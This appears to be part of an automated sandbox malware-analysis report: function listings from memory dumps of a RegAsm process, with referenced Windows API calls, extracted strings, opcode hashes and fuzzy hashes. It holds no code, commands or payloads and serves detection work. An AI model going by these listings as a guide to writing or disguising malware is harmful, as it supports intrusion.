Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bfda602dab686468c1db143360962178a60da431afc76847020c6505389398fc
Instruction ID: 36d7560c1b6fe6b9c5727c463bd62bc21667f0965d827f223119fda31392ab03
Opcode Fuzzy Hash: bfda602dab686468c1db143360962178a60da431afc76847020c6505389398fc
Instruction Fuzzy Hash: 5721A075E022189FDB48DFA9E484ADDBBB5FB89311F10906AE415B7360D7346881CF64

Function 06DCEF40 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1812d9a56b9fb3f6c72602a6c7713e299493f1ab15eddeab778e2560e6c9921b
Instruction ID: b353a807e7034e615e0c2be7a7da43d014051f4f9ce9973ef44774bc9b380be5
Opcode Fuzzy Hash: 1812d9a56b9fb3f6c72602a6c7713e299493f1ab15eddeab778e2560e6c9921b
Instruction Fuzzy Hash: B9624B75A002099FDB55DF68D494AADBBF6FF88320F2581A9E805DB361CB30ED45CB90

Function 06B23F50 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527d01d3e6bded5ca8c773f65289a616bf7b51807428bd4054ca3f5da4bcd393
Instruction ID: 9562a682b5b7dab8ca2d775d22cf3d3465840229488229c40f8ddf0b590cacc4
Opcode Fuzzy Hash: 527d01d3e6bded5ca8c773f65289a616bf7b51807428bd4054ca3f5da4bcd393
Instruction Fuzzy Hash: 70128174F002168FDB54DF69C894AAEBBF2FF88600B1491A9E905EB755DB31EC41CB90

Function 06E08C30 Relevance: .4, Instructions: 426COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cc8d2466edb63fa55c3558f5ab9f799383e66d227ee0418db41af45d2451575
Instruction ID: 2b57291510c0082a158b563b1e47f8c4e54ad1ea7b08768170676959b5b6b2b5
Opcode Fuzzy Hash: 4cc8d2466edb63fa55c3558f5ab9f799383e66d227ee0418db41af45d2451575
Instruction Fuzzy Hash: 84228D74E01229CFDBA5DF65C850BD9BBB2AF89300F1091EAD549AB251EB319EC5CF40

Function 06B267D8 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c323063ef47fc61ce903d53a309d5601614866fe88533994f5e37f6df20f1aa3
Instruction ID: 54fd088f436925e187b56c131ca69ab1635d4e38e85944b90eac9ed325309ea4
Opcode Fuzzy Hash: c323063ef47fc61ce903d53a309d5601614866fe88533994f5e37f6df20f1aa3
Instruction Fuzzy Hash: 3FF1B575A013199FDB55DFA8D840B9EBBF2EF89300F1485A5E509DB291EB30EC45CB90

Function 06DC0A0C Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f685a017e8a30df6c7f4ba17ee44a9a31ca345b7a461211918f10bd967fc6ac7
Instruction ID: 55de9e4da4df1158f7337c6aeb68debc1a93c9c7bcc1385ff5cba9c1b0eed58f
Opcode Fuzzy Hash: f685a017e8a30df6c7f4ba17ee44a9a31ca345b7a461211918f10bd967fc6ac7
Instruction Fuzzy Hash: 8FD1A275A0060A8FCB14DF79D894AAEBBF6FF89310B158569E845D7361DB30EC11CBA0

Function 06B2A688 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa19518d0d8b9e6256493b2fe2027cdaba8c8d4afbc95f09037b8dabfcef8b9f
Instruction ID: b2f5f254a367f41ccd6132e0c764134d4d3fbd971da2da1231915e30f9cbdfb6
Opcode Fuzzy Hash: aa19518d0d8b9e6256493b2fe2027cdaba8c8d4afbc95f09037b8dabfcef8b9f
Instruction Fuzzy Hash: A2D1E374A01218CFDB15EFB4D8546ADBBB2FF8A301F1081A9D44AAB294DB355C86CF51

Function 06B2A6B8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418d1734577588543ac084515e663a8e1e969c771837c965c534d42726c66dee
Instruction ID: ea53086c82efe82a14d23cb8340f819ddf906a867fe50e8cb9dedf7fdd055346
Opcode Fuzzy Hash: 418d1734577588543ac084515e663a8e1e969c771837c965c534d42726c66dee
Instruction Fuzzy Hash: 20D1D374E01218CFCB18EFB4D8586ADBBB2FF8A301F1081A9D44AAB294DB355D85CF51

Function 031AD0A8 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031AD136
GetCurrentThread.KERNEL32 ref: 031AD173
GetCurrentProcess.KERNEL32 ref: 031AD1B0
GetCurrentThreadId.KERNEL32 ref: 031AD209

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 445648484cd6a2c5f9dffb4878a386a9c448fe54d1f6bb9d816d9341099edaf0
Instruction ID: 580017c2d6b34295d028c25ec1556560e92b5e9fa7b8ffdb525e3c4294cb4191
Opcode Fuzzy Hash: 445648484cd6a2c5f9dffb4878a386a9c448fe54d1f6bb9d816d9341099edaf0
Instruction Fuzzy Hash: 9A5169B4900B49CFDB14DFA9D588B9EBBF1EB88314F24C459E019AB390D7345944CB66

Function 031AD0B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031AD136
GetCurrentThread.KERNEL32 ref: 031AD173
GetCurrentProcess.KERNEL32 ref: 031AD1B0
GetCurrentThreadId.KERNEL32 ref: 031AD209

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9ce9f205860a121597d29327f5a168aacc2778bb1f2fdee6dad5c94b432dde86
Instruction ID: 5d02563445ee9565a749839e566cbd8c42aec9af38c9f0f8a22f1a734ecb37bf
Opcode Fuzzy Hash: 9ce9f205860a121597d29327f5a168aacc2778bb1f2fdee6dad5c94b432dde86
Instruction Fuzzy Hash: DB5169B4900B09CFDB14DFA9D548BDEBBF1AB88310F24C459E019AB350D7345944CB65

Function 06DC7D78 Relevance: 3.8, Strings: 3, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Zi, xrefs: 06DC7DAA
st, xrefs: 06DC7DD8
|i, xrefs: 06DC7DC4

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Zi$|i$st
API String ID: 0-362473364
Opcode ID: 4390506dbe096015f644ca937f594ac90fdc7b76307fbe358a1044f6e3ed9190
Instruction ID: d0f807cd8ee44ab2716fc6a47ab806965a890ab3855422b92e7bc999e07d3161
Opcode Fuzzy Hash: 4390506dbe096015f644ca937f594ac90fdc7b76307fbe358a1044f6e3ed9190
Instruction Fuzzy Hash: FBF08C352017085BD302E7BCE8008DEB79ABEC9620750CA3DC44A8F610EFB1BD068BD1

Function 06DC7D7A Relevance: 3.8, Strings: 3, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Zi, xrefs: 06DC7DAA
st, xrefs: 06DC7DD8
|i, xrefs: 06DC7DC4

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Zi$|i$st
API String ID: 0-362473364
Opcode ID: 59d0c7ee95350dadbb037acc9d01ed44c2ee275ac303e206d69422f8aa8b47b9
Instruction ID: 6e42d5c94d75246c6eebfd0b03778ad2cd4640250813e0e2a87d1cb6b5add28b
Opcode Fuzzy Hash: 59d0c7ee95350dadbb037acc9d01ed44c2ee275ac303e206d69422f8aa8b47b9
Instruction Fuzzy Hash: F2F0AF352017045BD302E77CE4008EEB756BEC9620750CB3DC04A8F610DF71AD068BD1

Function 06DC0D20 Relevance: 2.9, Strings: 2, Instructions: 407
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t]i, xrefs: 06DC0EAD
4ai, xrefs: 06DC0F77

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4ai$t]i
API String ID: 0-2284143291
Opcode ID: 428f28e81923e7aa8105584d9c6767f5485576ff18c9bc95b529797432d8c7dc
Instruction ID: a9f69492b336d88a46d1c9b939b3a7f4a0d616e822665ed00c601d362919f037
Opcode Fuzzy Hash: 428f28e81923e7aa8105584d9c6767f5485576ff18c9bc95b529797432d8c7dc
Instruction Fuzzy Hash: 66F17774B00209DFDB55DFA8E454AAEBBB2FF88310F148568E805AB391DB35DC85CB91

Function 06DC8B68 Relevance: 2.8, Strings: 2, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Di, xrefs: 06DC8BDE
Di, xrefs: 06DC8C4B

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Di$Di
API String ID: 0-3532409067
Opcode ID: 8027e3ecf17cefa8053a276e20a0c115650a9db2b09dd4468c0acc92376e973c
Instruction ID: c6a6ada65a04a93e8f63d1f565c9664005ddc1b0a6a118e283685640e2213319
Opcode Fuzzy Hash: 8027e3ecf17cefa8053a276e20a0c115650a9db2b09dd4468c0acc92376e973c
Instruction Fuzzy Hash: FAC1593462810FCFE798CA5CE98097677F9E7683E0B09A558E1A7CB660C734ED409F91

Function 031AAE30 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031AB086

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 67cebdaaad27735b6b3f26d6066a613388b41a94a0e1b0c4dd4c2ca93dfc0180
Instruction ID: 056fb389592cedbbd163f23c656d6535278fd0e4c696cfecca3d613934c72f2c
Opcode Fuzzy Hash: 67cebdaaad27735b6b3f26d6066a613388b41a94a0e1b0c4dd4c2ca93dfc0180
Instruction Fuzzy Hash: 928188B4A00B458FD728DF29D14079ABBF5FF88301F04892ED086DBA40D775E84ACB90

Function 06E07C3C Relevance: 1.6, APIs: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 06E07D88

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a1f073052c4ad172f5e42b88b0d5d4b5518b4b82dcfb2e454c052a70f25423dc
Instruction ID: 2ec5a7063d3b0f27b5d1718f0e75b6689a3f4d6fab358859aa21d7c09e5b3070
Opcode Fuzzy Hash: a1f073052c4ad172f5e42b88b0d5d4b5518b4b82dcfb2e454c052a70f25423dc
Instruction Fuzzy Hash: 3F51C074E01308DFDB58DFA5E4946AEBBB6FF89304F10A06AD416AB354DB346952CF40

Function 031A5935 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031A59F1

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 78e12ce1feaa6922ebda029638364846406b2909a164f9492054503d28188f0c
Instruction ID: 9dd0eca7f81b8c1599a90b28cf93fe4c735ce95d260928e98b237994905d3bac
Opcode Fuzzy Hash: 78e12ce1feaa6922ebda029638364846406b2909a164f9492054503d28188f0c
Instruction Fuzzy Hash: 3E41F170D04718CFEB24CFA9C88478EBBB6BF4A304F24806AD048AB251DB756945CF50

Function 031A4248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031A59F1

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 371c101cd12becb9a520591df3fe529cd217d4283e760338274ee170b2ad7a59
Instruction ID: d76f20169cf90b3d6efd2d39f50f11ffd168075e979bc281d90361b88cc3e242
Opcode Fuzzy Hash: 371c101cd12becb9a520591df3fe529cd217d4283e760338274ee170b2ad7a59
Instruction Fuzzy Hash: 1241F274D04719CFDB24CFA9C884B8EBBB6FF49305F24806AD448AB251DB716945CF90

Function 06DC6918 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

t]i, xrefs: 06DC6980

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: t]i
API String ID: 0-3303605316
Opcode ID: 3f130628d224bd34fa0e7c8f6dc32ca9b13b4491d8fb434902b360ad9ddea9e4
Instruction ID: eea5c91fc9e0a25140d9d2bd1325b291a4c95912a061bd86d5e0502bd9a70fe1
Opcode Fuzzy Hash: 3f130628d224bd34fa0e7c8f6dc32ca9b13b4491d8fb434902b360ad9ddea9e4
Instruction Fuzzy Hash: AAD19974B003099FDB15DF78D494AAAB7F2EF89210F10856DE9068B391DB35EC46CB91

Function 031AD2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AD387

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b2f9ef1e6b402431cdd35db79d4135e0559ebd83ffc4186599d6f189b4e0a969
Instruction ID: a067f494807c300cc830af469b481c5e76a8abe2798bdff5169c1a0d3ecc664f
Opcode Fuzzy Hash: b2f9ef1e6b402431cdd35db79d4135e0559ebd83ffc4186599d6f189b4e0a969
Instruction Fuzzy Hash: 2321E5B5900649EFDB10CF9AD985ADEFBF5EB48710F14841AE914A3310D374A944CF65

Function 031AD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AD387

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2a52b0bdb06452ceae124572dcf510668a2b2044d81cabc8072982af7bd4f42d
Instruction ID: 0ee76a76481ee1b4d692bfd92e919c93d053b18afe7c126ec6a6a3d7d9fd59ee
Opcode Fuzzy Hash: 2a52b0bdb06452ceae124572dcf510668a2b2044d81cabc8072982af7bd4f42d
Instruction Fuzzy Hash: CC21E4B5900748DFDB10CFAAD984ADEFBF4EB48310F14841AE918A3310C374A944CFA5

Function 031AA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB101,00000800,00000000,00000000), ref: 031AB312

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c912a1fd8bb06f97bf121432455f3dea23d073bf0f025c5c3572fbb2ac15c340
Instruction ID: 6894159ea3ec51062320332f7ddded0569089310c5ad3f4f5a41924ed1319997
Opcode Fuzzy Hash: c912a1fd8bb06f97bf121432455f3dea23d073bf0f025c5c3572fbb2ac15c340
Instruction Fuzzy Hash: 981114B69047899FDB10CF9AD844ADEFBF4EF48311F14842ED419A7200C3B4A945CFA5

Function 031AB2A0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AB101,00000800,00000000,00000000), ref: 031AB312

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 087e51621a6af744b0095a31abcc69a16dd2cc9798ddc89e60c9ae2dbb48ca41
Instruction ID: b26cd4a1de7abc75fef95dc657a58aa7b3ddfeec8887a307b291ba9e30224157
Opcode Fuzzy Hash: 087e51621a6af744b0095a31abcc69a16dd2cc9798ddc89e60c9ae2dbb48ca41
Instruction Fuzzy Hash: CF1114BA9047899FDB10CFAAD844ADEFBF4AF88310F14841AD459A7300C3B4A545CFA1

Function 06E07A58 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 06E07ACE

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID: KeyboardLayout
String ID:
API String ID: 194098044-0
Opcode ID: dcb2d41155ce2b3a966cb85953c64de843853864d6f2e0a81983584a7d4ee1b1
Instruction ID: 5ded231d7663ee862746b396ab19b9283bc2e9b36fc2199f9b7e8c136b586ea3
Opcode Fuzzy Hash: dcb2d41155ce2b3a966cb85953c64de843853864d6f2e0a81983584a7d4ee1b1
Instruction Fuzzy Hash: 13117CB4D017898FDB11DFA5D4487DEBFF0EB48314F14885ED459AB240C3346544CBA1

Function 031AB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031AB086

Memory Dump Source

Source File: 0000000B.00000002.2109199768.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_31a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3fb8cebf93840fac06f323e3c69655969a157d717d886714c69de0e9b30b4384
Instruction ID: b9a036011a77a29305fd7cbb87fbafc7530f6db5909d169f6763922e65c8737a
Opcode Fuzzy Hash: 3fb8cebf93840fac06f323e3c69655969a157d717d886714c69de0e9b30b4384
Instruction Fuzzy Hash: B911E0B6C04B89CFDB20CF9AD944BDEFBF4AB88624F14841AD469B7210C375A545CFA1

Function 06E074DC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E07BBD

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9b97553fca89f8a6741ed0d3e8d9850334656c850573c007b8dabbc67602fcc3
Instruction ID: e8fd37a5e990a7534fdd574b6bc689111df045334405822e66007b751aae01b2
Opcode Fuzzy Hash: 9b97553fca89f8a6741ed0d3e8d9850334656c850573c007b8dabbc67602fcc3
Instruction Fuzzy Hash: 321145B5800748CFDB20CF9AD848BDEBBF5EB48320F10845AD558A7340C378A944CFA5

Function 06E07B60 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E07BBD

Memory Dump Source

Source File: 0000000B.00000002.2122369915.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6e00000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ca0ca3ad2fe84c12ea88e74182b8363d8ab573630e45918d5322ebcf68ef47f4
Instruction ID: c5eb50ff0812b163b2b1533a7bad9ccd130cdd3c5b59dac108594a9dd8c55cd1
Opcode Fuzzy Hash: ca0ca3ad2fe84c12ea88e74182b8363d8ab573630e45918d5322ebcf68ef47f4
Instruction Fuzzy Hash: 361133B5900788CFDB20CFAAD845BDEBFF4EB48224F14845AD458A7300C374A944CFA5

Function 06B259D8 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

d, xrefs: 06B25C29

Memory Dump Source

Source File: 0000000B.00000002.2121254177.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6b20000_RegAsm.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: ddbd1f0c8fb44ba5f04ffff4e787763e724aa60a797f26f7ffb9461f78593185
Instruction ID: d1b71cc1d9397b32eba53c8bfede631f790ec416ab3d5ed91a334fc579df1de6
Opcode Fuzzy Hash: ddbd1f0c8fb44ba5f04ffff4e787763e724aa60a797f26f7ffb9461f78593185
Instruction Fuzzy Hash: BFC18C75600712CFCB25CF28C4849AABBF2FF89310755C999D45A8B661EB30FC46CB94

Function 06DC0B64 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

d^i, xrefs: 06DC28D0

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: d^i
API String ID: 0-2157935631
Opcode ID: b586e55fe97eaa78f8e2a6b756a72a4c825ce98b40c0289121d42584a97666cc
Instruction ID: 913917dcab0d6b97c690a95ceab62bd295adf76ca7874a1d63d7e1e5d66503d1
Opcode Fuzzy Hash: b586e55fe97eaa78f8e2a6b756a72a4c825ce98b40c0289121d42584a97666cc
Instruction Fuzzy Hash: 4D51BD35B007059FCB649F79D89456ABBF6FFC92207148A2DE846C7361DB30ED058B90

Function 06DC6908 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

t]i, xrefs: 06DC6980

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: t]i
API String ID: 0-3303605316
Opcode ID: 725c5b97ea7046d0d70840805a7498a7f6cb71c4a9f12e911161219e1a95a0d5
Instruction ID: 897e59462f9e504df5c4ccee1ae1abff9fbadeb8bab3af8d5f3d77f0624139f6
Opcode Fuzzy Hash: 725c5b97ea7046d0d70840805a7498a7f6cb71c4a9f12e911161219e1a95a0d5
Instruction Fuzzy Hash: B2616C74A00309AFDB15DFA8D484A9EBBF2FF88310F108669E8459B350DB75ED45CB91

Function 06DC0D11 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

t]i, xrefs: 06DC0EAD

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: t]i
API String ID: 0-3303605316
Opcode ID: 056160ca6aac2a59ce2b9cc05350ced687634e6944ba279c9c69a65536361f16
Instruction ID: 2bb44108c8b7184f3050967b055f4223d8f5fdc023082e0ab09c9f891b3f07a8
Opcode Fuzzy Hash: 056160ca6aac2a59ce2b9cc05350ced687634e6944ba279c9c69a65536361f16
Instruction Fuzzy Hash: 8F714C34A0120ADFDB55DF68E488A9EBBB2FF88310F054558E8059B3A1DB35EC85CF91

Function 06DC0FB3 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4ai, xrefs: 06DC0F77

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4ai
API String ID: 0-2942327727
Opcode ID: 8d1fd9a4dc5903536c0a5a2e88bc587049e255f568c09f773a454a65f3678b0f
Instruction ID: 3e2bce2f902c9236a479e85c0808f031896d186167f8eec74b27f4afbf897f40
Opcode Fuzzy Hash: 8d1fd9a4dc5903536c0a5a2e88bc587049e255f568c09f773a454a65f3678b0f
Instruction Fuzzy Hash: 3F31F339A00209EFDF05CFA4E985AEDBBB6FF8C320F108119E915A7250DB35A951DF50

Function 06DC8B58 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Di, xrefs: 06DC8BDE

Memory Dump Source

Source File: 0000000B.00000002.2122041054.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6dc0000_RegAsm.jbxd

Similarity

API ID:
String ID: Di
API String ID: 0-466438607
Opcode ID: f7a1c4dfcc708189a898ae01b23e1b36710fabd9e78d8aac9eaad8bae9433d9a
Instruction ID: ae07daee709b8e6fc60040bbca3cdd1db8b9680c0f0674680d37695a48055582
Opcode Fuzzy Hash: f7a1c4dfcc708189a898ae01b23e1b36710fabd9e78d8aac9eaad8bae9433d9a
